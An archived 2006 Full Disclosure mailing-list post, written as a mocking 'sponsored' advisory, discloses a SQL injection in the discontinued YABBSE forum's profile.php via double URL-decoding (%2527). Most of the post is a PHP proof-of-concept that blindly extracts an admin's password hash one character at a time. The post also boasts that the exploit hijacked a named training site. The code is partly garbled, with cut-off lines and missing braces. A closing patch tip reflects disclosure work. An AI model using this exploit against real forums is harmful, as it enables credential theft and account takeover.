Home page logo

fulldisclosure logo Full Disclosure mailing list archives

From: "Sam Thomas" <Sam.Thomas () aquaterra org>
Date: Fri, 23 Jun 2006 01:43:50 +0100

Hey str0ke - Are you the same str0ke whose code I've been ripping, damn I guess I better release my first N3td3v 
Sponsering Disclosure.....

NDSD-06-001: YABBSE SQL Injection
June 23, 2006

-- Sponsered post


-- Affected Vendor:
The YABB SE Team

-- Affected Products:
YABBSE (This product is discontinued, but unfortunately still seems to be in mainstream use)

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary SQL on vulnerable installations of the YABBSE message 

The specific flaw exists within the "profile.php" php script which is used to give access to user profiles.

-- Vendor Response:The vendor for this product essentially no longer exists. It is recommended that you move to a 
supported message board.

-- Disclosure Timeline:
2005.06.26 - Vulnerabiliity Discovered
2005.06.27 - Vendor found to have discontinued support
2006.06.23 - Public release of advisory

-- Vulnerability

The vulnerability exists where the user supplied variable $user is processed by the urldecode() function twice, this 
allows for the %2527 (decodes to %27 decodes to ') SQL injection technique.

- Exploit

The following PoC exploit can be used to retrieve any users (IE admin) password hash which in turn can be used to 
immitate and login as that user:

**BEGIN PoC Code

 yabbse exploit

 all versions - product discontinued

 most of the code ripped from http://www.milw0rm.com/exploits/1036 <http://www.milw0rm.com/exploits/1036>  so credit to 
str0ke and milkw0rm

$server = "www.uberhacker.com <http://www.uberhacker.com> ";
$port = 80;

$hash = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
        $idx = 0;
        $found = false;

        while( !($found) ) {
                $letter = substr($hex, $idx, 1);

                /* %2527 translates to %27, which gets past magic quotes. This is translated to ' by urldecode. */
                $url="/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" . 
                $header = getHeader($server, $port, $url, "");
                if(!preg_match("/An Error Has Occurred/",$header) ) {
                        echo $i . ": " . $letter . "\n";
                        $found = true;
                        $hash .= $letter;
                } else {

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
        $ip = gethostbyname($server);
        $fp = fsockopen($ip, $port);

        if (!$fp) {
                return "Unknown";
        } else {
                $com = "GET $file HTTP/1.1\r\n";
                $com .= "Host: $server:$port\r\n";
                $com .= "Connection: close\r\n";
                $com .= "\r\n";

                fputs($fp, $com);

                do {
                        $header.= fread($fp, 512);
                } while( !preg_match('/\r\n\r\n$/',$header) );

        return $header;
// jazzy2fives 2005-07-26 - mostly stolen from milw0rm.com [2005-06-08] 

** End PoC Code

-- Patch

It is recomended that if you insist on continuing the use of this product, you remove the line which reads "$user = 
urldecode($user);" from all functions in "\sources\proflie.php"

-- Credit:

This vulnerability was discovered by me! 

-- About N3td3v Sponsoring Disclosures:

Established by me, n3td3v sponsering disclosures (NDSD) is a system established to reward n3td3v for his (her?) posts 
to full disclosure which bring me more amusement than any 0-day possibly could. 

The NDSD is unique in how vulnerability information sponsers the incompetency of n3td3v, for each amusing n3td3v post 
NDSD will attempt to release a disclosure of a previously unknown lame exploit. This is because most valid complaints 
aginst n3td3v claim that (s/)he contributes nothing to the secutiy comunity. The aim of NDSD is to sponser n3td3v posts 
thus ensuring that each directly corresponds to a positve contribution to FULL-DISCLOSURE.

-- Misc

For anyone interested, this was the exploit used to hijack www.uberhacker.com <http://www.uberhacker.com>  - a legal 
hacker trainng site, which had as their primary challenge to hijack the website. The site has since had the majority of 
it's content removed.

NDSD are a subsidiary of empty vessels (www.emptyvessels.org.uk <http://www.emptyvessels.org.uk> ), one day we might 
get our website up.


For more information about Aquaterra Leisure, see www.aquaterra.org

To shop for speedo or polar at bargain prices, see www.aquashop.org


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • NDSD-06-001 Sam Thomas (Jun 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]